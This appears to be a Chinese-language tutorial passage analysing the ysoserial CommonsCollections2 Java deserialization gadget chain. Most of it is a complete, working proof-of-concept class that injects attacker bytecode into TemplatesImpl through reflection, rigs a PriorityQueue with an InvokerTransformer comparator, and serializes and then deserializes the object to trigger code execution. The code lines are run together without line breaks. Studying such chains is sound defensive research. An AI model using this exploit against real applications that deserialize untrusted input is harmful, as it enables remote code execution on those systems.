三、queue属性赋值
transient queue无法序列化 , 但在PriorityQueue的writeobject()、readobject中对queue做了重写,实现序列化和反序列化 。
private void writeObject(java.io.ObjectOutputStream s)throws java.io.IOException {//略for (int i = 0; i < size; i++)s.writeObject(queue[i]);}private void readObject(java.io.ObjectInputStream s)throws java.io.IOException, ClassNotFoundException { //略for (int i = 0; i < size; i++)queue[i] = s.readObject();heapify();}通过反射修改queues[0],利用如下:
TransformingComparator transformingComparator = new TransformingComparator(transformer);PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, transformingComparator);priorityQueue.add(1);priorityQueue.add(2);Field iMethodName = transformer.getClass().getDeclaredField("iMethodName");iMethodName.setAccessible(true);iMethodName.set(transformer,"newTransformer");Field queue = priorityQueue.getClass().getDeclaredField("queue");queue.setAccessible(true);Object[] queues = (Object[]) queue.get(priorityQueue);queues[0] = templates;//这里得替换queues[0]//如果queues[0]依旧保留使用Integer,会因为无法找到newTransformer报错 。最终完整利用实现:
public class CC2Test2 {public static void main(String[] args) throws Exception {TemplatesImpl templates = new TemplatesImpl();Class templates_cl= Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");Field name = templates_cl.getDeclaredField("_name");name.setAccessible(true);name.set(templates,"xxx");Field transletIndex = templates_cl.getDeclaredField("_transletIndex");transletIndex.setAccessible(true);transletIndex.set(templates,0);byte[] code = Files.readAllBytes(Paths.get("D:\\workspace\\javaee\\cc1\\target\\classes\\com\\Runtimecalc.class"));byte[][] codes = {code};//给_bytecodes赋值Field bytecodes = templates_cl.getDeclaredField("_bytecodes");bytecodes.setAccessible(true);bytecodes.set(templates,codes);//要顺利执行,_tfactory得赋值,因为defineTransletClasses中调用了_tfactory的getExternalExtensionsMap//_tfactorys是TransformerFactoryImpl类型的TransformerFactoryImpl transformerFactory = new TransformerFactoryImpl();Field tfactory = templates_cl.getDeclaredField("_tfactory");tfactory.setAccessible(true);tfactory.set(templates,transformerFactory);InvokerTransformer transformer = new InvokerTransformer("toString", null, null);TransformingComparator transformingComparator = new TransformingComparator(transformer);PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, transformingComparator);priorityQueue.add(1);priorityQueue.add(2);Field iMethodName = transformer.getClass().getDeclaredField("iMethodName");iMethodName.setAccessible(true);iMethodName.set(transformer,"newTransformer");Field queue = priorityQueue.getClass().getDeclaredField("queue");queue.setAccessible(true);Object[] queues = (Object[]) queue.get(priorityQueue);queues[0] = templates;ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("D:\\cc2.ser"));objectOutputStream.writeObject(priorityQueue);ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("D:\\cc2.ser"));objectInputStream.readObject();}}
文章插图
【ysoserial CommonsCollections2 分析】
